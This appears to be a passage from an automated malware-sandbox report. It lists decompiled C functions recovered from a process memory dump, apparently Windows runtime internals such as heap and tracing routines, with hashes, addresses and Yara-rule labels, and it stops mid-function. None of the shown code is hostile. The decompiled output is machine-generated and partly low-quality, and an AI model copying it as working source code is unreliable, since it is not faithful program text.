Instruction ID: c20d332e31d09ec5ab341d87d9c7357af5a7899718695c547d1a602ac0a54bcc
Opcode Fuzzy Hash: ed931b30d615ffb5c01b3c4a0f54037aa17b23140ade7cf5b8b0438388bb653f
Instruction Fuzzy Hash: 00219F72A20208AFCB04DF58CD81F6ABBBDFF44758F250468E909AB251DB71ED51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 052A6CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E052A6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E05247D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E05247D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x5205c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0525F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0525F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E052A7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L05242400( &_v52);
								}
								_t21 = L05242400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x052a6cfb
0x052a6d00
0x052a6d02
0x052a6d06
0x052a6d0a
0x052a6d0e
0x052a6d19
0x052a6d2b
0x052a6d1b
0x052a6d24
0x052a6d24
0x052a6d33
0x052a6d39
0x052a6d46
0x052a6d4f
0x052a6d61
0x052a6d51
0x052a6d5a
0x052a6d5a
0x052a6d69
0x052a6d6b
0x052a6d6d
0x052a6d6f
0x052a6d6f
0x052a6d74
0x052a6d79
0x052a6d7a
0x052a6d7f
0x052a6d82
0x052a6d88
0x052a6d89
0x052a6d90
0x052a6d94
0x052a6da7
0x052a6db1
0x052a6db1
0x052a6dbb
0x052a6dbb
0x052a6d90
0x052a6d69
0x052a6d46
0x052a6dc6

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48fc1113bf4ccab3561c2249e1882b5a4f4974e917aa798508306b15da5177c1
Instruction ID: d0210df20c5aac2c36248c93c00ab2da7a48d79a4c76ce6f251d2013f697f9d1
Opcode Fuzzy Hash: 48fc1113bf4ccab3561c2249e1882b5a4f4974e917aa798508306b15da5177c1
Instruction Fuzzy Hash: 3E21F573A24A859BC311DF29C948B6BB7ECFF81790F0C0456F954C7251E734E509CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 052F070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E052F070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E052F07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E052EAFDE( &_v8,  &_v12);
					E052F1293(_t38, _v28, _t60);
					if(E05247D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E052E14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x052f071b
0x052f0724
0x052f0734
0x052f0738
0x052f074b
0x052f074b
0x052f0753
0x052f0753
0x052f0759
0x052f075d
0x052f0774
0x052f0779
0x052f077d
0x052f0789
0x052f0795
0x052f07a7
0x052f0797
0x052f07a0
0x052f07a0
0x052f07af
0x052f07c4
0x052f07cd
0x052f07cd
0x052f07af
0x052f07dc

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: bf2bf658756731286486d67247145c01c42793aece6c9eda895a6a49c6cc368a
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 3D2134363182009FC705DF18D888B6ABBA5FFC4310F048579FA9A8B382C730D809CB91

Uniqueness

Uniqueness Score: -1.00%

Function 052A7794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E052A7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x5317b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0526F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E05247D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E05269AE0();
					_t24 = L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x052a7799
0x052a779a
0x052a779b
0x052a77a3
0x052a77ab
0x052a77ae
0x052a77b1
0x052a77b1
0x052a77bf
0x052a77c4
0x052a77c8
0x052a77ce
0x052a77d4
0x052a77e0
0x052a77e0
0x052a77d6
0x052a77d6
0x052a77de
0x00000000
0x00000000
0x052a77de
0x052a77e5
0x052a77f0
0x052a77f3
0x052a77f6
0x052a77fd
0x052a7800
0x052a780c
0x052a7818
0x052a782b
0x052a781a
0x052a7823
0x052a7823
0x052a7830
0x052a7831
0x052a7838
0x052a783d
0x052a783e
0x052a784f
0x052a784f
0x052a785a

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7eeda6ddcf6fe3c9c2ad843673d7956a31ef417c2405709f4ccf1275063fd5b
Instruction ID: f6d223f40ce5f87a92e937bf5053752283fd83316f7cb82f61e53791c8a870c0
Opcode Fuzzy Hash: c7eeda6ddcf6fe3c9c2ad843673d7956a31ef417c2405709f4ccf1275063fd5b
Instruction Fuzzy Hash: F1219F72610604AFC725DF69DC84E6BB7A9FF48740F144569F50ACB650DB34E900CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0524AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0524AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E05247D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E05247D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E05247D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E05247D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E052A7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0524ae78
0x0524ae7c
0x0524ae7e
0x0524ae81
0x0524ae86
0x0524ae8d
0x05292691
0x0524ae93
0x0524ae93
0x0524ae93
0x0524ae98
0x0524ae9d
0x052926a2
0x052926b4
0x052926a4
0x052926ad
0x052926ad
0x052926b9
0x00000000
0x052926bb
0x00000000
0x052926bb
0x0524aea3
0x0524aea3
0x0524aea3
0x0524aeaa
0x052926c0
0x052926c9
0x052926c9
0x0524aeb3
0x052926d4
0x052926e1
0x00000000
0x00000000
0x052926e7
0x052926ee
0x052926f0
0x052926f9
0x052926f9
0x05292702
0x05292708
0x05292708
0x0529270b
0x0529270f
0x05292711
0x05292711
0x05292725
0x05292725
0x00000000
0x0524aeb9
0x0524aeb9
0x0524aebf
0x0524aebf
0x0524aeb3

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 852e8ff73ff671b0261ce5fdfd08749a151ed3adbddb6d9d975bcf529eb02ae9
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 7721B035736682EBDB1ADB29C948B2577EAFF44240F0900A0DD098B792D774DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0525FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0525FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E052376E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0525fd9b
0x0525fda0
0x0525fda1
0x0525fdab
0x0525fdad
0x0525fdb0
0x0525fdb8
0x0525fe0f
0x0525fde6
0x0525fde9
0x0525fdec
0x0529c0c0
0x0525fdfe
0x0525fe06
0x0525fe06
0x0529c0c8
0x0525fe2d
0x0525fe2d
0x00000000
0x0525fe2d
0x0529c0d1
0x0529c0e0
0x0529c0e5
0x0529c0e5
0x0529c0e8
0x00000000
0x0529c0e8
0x0525fdf4
0x00000000
0x00000000
0x0525fdf6
0x0525fdfa
0x0525fe1a
0x0525fe1f
0x0525fe1f
0x0525fdfc
0x00000000
0x0525fdfc
0x0525fdcc
0x0525fdd0
0x0525fe26
0x00000000
0x0525fe26
0x0525fdd8
0x0525fddb
0x0525fddd
0x0525fde0
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: ce10ab26cd4497f43e45e9c6b7ec258a44a3811ace4aaf493cf1005e07289d3a
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 7D217CB2625641DBDB35CF09C640E66B7E6FF94A20F25857EE94A87A10D730DC00CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0525B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0525B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E05242280(_t12, 0x5318608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E052600C2(0x5318608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0525b395
0x0525b3a2
0x0525b3a5
0x0525b3aa
0x0525b3b2
0x0525b3ba
0x0525b3bd
0x0525b3c0
0x0525b3c4
0x0525b3c9
0x0529a3e9
0x0529a3ed
0x0529a3f0
0x0529a3ff
0x0529a403
0x0529a409
0x00000000
0x00000000
0x0529a40b
0x0529a40b
0x0529a40f
0x0529a415
0x0529a423
0x0529a423
0x0529a415
0x0525b3d1
0x0525b3e8
0x0525b3e8
0x0525b3d9

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c37529ec75387c2118bcc6ea1408bbb22fc57a4a9ff27a56fd9aa48b9d6d515
Instruction ID: 0429eab6b5c17b15bf4e14e736a10fee7d783172c7f0bd9cb01d212ef74a34a0
Opcode Fuzzy Hash: 6c37529ec75387c2118bcc6ea1408bbb22fc57a4a9ff27a56fd9aa48b9d6d515
Instruction Fuzzy Hash: CD114C373251109FCB1CCA258D8192B7267EFC5270B240129EE1B97380DE315C02C698

Uniqueness

Uniqueness Score: -1.00%

Function 05229240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05229240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x52ff708);
				E0527D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E052695D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E052695D0();
				_t33 =  *0x53184c4; // 0x0
				L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x53184c4; // 0x0
				L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x53184c4; // 0x0
				E05242280(L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x53186b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E052695D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E052695D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E05229325();
					_t50 =  *0x53184c4; // 0x0
					return E0527D0D1(L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x05229240
0x05229242
0x05229247
0x0522924c
0x0522924e
0x05229255
0x05229257
0x0522925a
0x0522925f
0x0522925f
0x05229266
0x05229271
0x05229276
0x05229279
0x0522927e
0x05229295
0x0522929a
0x052292b1
0x052292b6
0x052292d7
0x052292dc
0x052292e0
0x052292e6
0x052292e8
0x052292ee
0x05229332
0x05229333
0x05229337
0x05229338
0x0522933a
0x0522933a
0x0522933d
0x05229342
0x05229342
0x05229345
0x05229349
0x0522934e
0x05229352
0x05229357
0x052292f4
0x052292f4
0x052292f6
0x052292f9
0x05229300
0x05229306
0x05229324
0x05229324

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4fe8d71dfc3b979d2ed3dc9ab50ec2186151157fde45bdaabf6b9ae5036f91f0
Instruction ID: fcd35f9b23ef42d40689da256eef8678196da5b6692c6517bc78d21ebd0d4db9
Opcode Fuzzy Hash: 4fe8d71dfc3b979d2ed3dc9ab50ec2186151157fde45bdaabf6b9ae5036f91f0
Instruction Fuzzy Hash: FC214C32261600EFC725EF28CA44F1ABBF9FF08704F544568E14A8B6A1CB34E991DF48

Uniqueness

Uniqueness Score: -1.00%

Function 052B4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E052B4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x53008d0);
				E0527D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E052B41E8(__ebx, __edi, __ecx, _t39);
				E0523EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x53187e4;
					_t18 =  *0x53187e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x5315cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x53187e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x53187e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L05227055(_t31 + 0xfffffff8);
								_t24 =  *0x53187e0; // 0x0
								_t18 = _t24 - 1;
								 *0x53187e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x5315cd0;
				if( *0x5315cd0 <= 0) {
					L05227055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x53187e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x53187e8 = _t30;
						 *0x53187e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0527D0D1(L052B4320());
			}

0x052b4257
0x052b4257
0x052b4257
0x052b4259
0x052b425e
0x052b4263
0x052b4265
0x052b4273
0x052b4278
0x052b427c
0x052b427f
0x052b4281
0x052b4287
0x052b42d7
0x052b42d7
0x052b42da
0x052b428d
0x052b428d
0x052b428f
0x052b4292
0x052b4297
0x052b429c
0x052b42a0
0x052b42a6
0x052b42a8
0x052b42ae
0x052b42b3
0x00000000
0x052b42ba
0x052b42ba
0x052b42bf
0x052b42c5
0x052b42ca
0x052b42cf
0x052b42d0
0x00000000
0x052b42d0
0x052b42b3
0x00000000
0x052b42a6
0x052b429c
0x052b42dc
0x052b42dc
0x052b42e3
0x052b4309
0x052b42e5
0x052b42e5
0x052b42e8
0x052b42ee
0x052b42f0
0x00000000
0x052b42f2
0x052b42f2
0x052b42f4
0x052b42f7
0x052b42f9
0x052b4300
0x052b4300
0x052b42f0
0x052b430e
0x052b431f

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283fbc39fa424e0843e99c4312e500abd4e2cebb776f0b579c8fbfc6048fd9fe
Instruction ID: 5789ba24c32b3f5eb0cb379e94b6c12e64096d909d62e0abcb5f41eb496ffb91
Opcode Fuzzy Hash: 283fbc39fa424e0843e99c4312e500abd4e2cebb776f0b579c8fbfc6048fd9fe
Instruction Fuzzy Hash: AB21BB70A20701CFDF15EF24C081AA4BBB6FF81394F24826AD159DF292DB709451CB88

Uniqueness

Uniqueness Score: -1.00%

Function 05252397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E05252397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x531848c != 0) {
					L0524FAD0(0x5318610);
					if( *0x531848c == 0) {
						E0524FA00(0x5318610, _t19, _t27, 0x5318610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E05252581(0x5318610, 0x52050a0, _t26, _t27, _t28);
						E0524FA00(0x5318610, 0x52050a0, _t27, 0x5318610);
					}
				} else {
					L1:
					_t11 =  *0x5318614; // 0x1
					if(_t11 == 0) {
						_t11 = E05264886(0x5201088, 1, 0x5318614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E05252581(0x5318610, (_t11 << 4) + 0x5205070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x052523b0
0x052523b6
0x05252409
0x05252415
0x05295ae9
0x00000000
0x0525241b
0x0525241b
0x0525241d
0x05252427
0x0525242e
0x05252430
0x05252430
0x052523b8
0x052523b8
0x052523b8
0x052523bf
0x052523fc
0x052523fc
0x052523c1
0x052523c3
0x052523d0
0x052523d8
0x052523d8
0x052523dc
0x052523de
0x052523e1
0x052523e1
0x052523ec

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e176fdedcc5eae32fc4a4af70c33b1a2d0a7dea92380e795f0fd7ce1dd8266
Instruction ID: c420972c21c5067de3b48ba0d2afd6119994aeb4d6a6351a879faf0844c9e006
Opcode Fuzzy Hash: a6e176fdedcc5eae32fc4a4af70c33b1a2d0a7dea92380e795f0fd7ce1dd8266
Instruction Fuzzy Hash: B5110831734310ABD728AA39AC84B16B79EAF94730F544416FF469B2C1C9B0D8408A5C

Uniqueness

Uniqueness Score: -1.00%

Function 052A46A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E052A46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0526F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
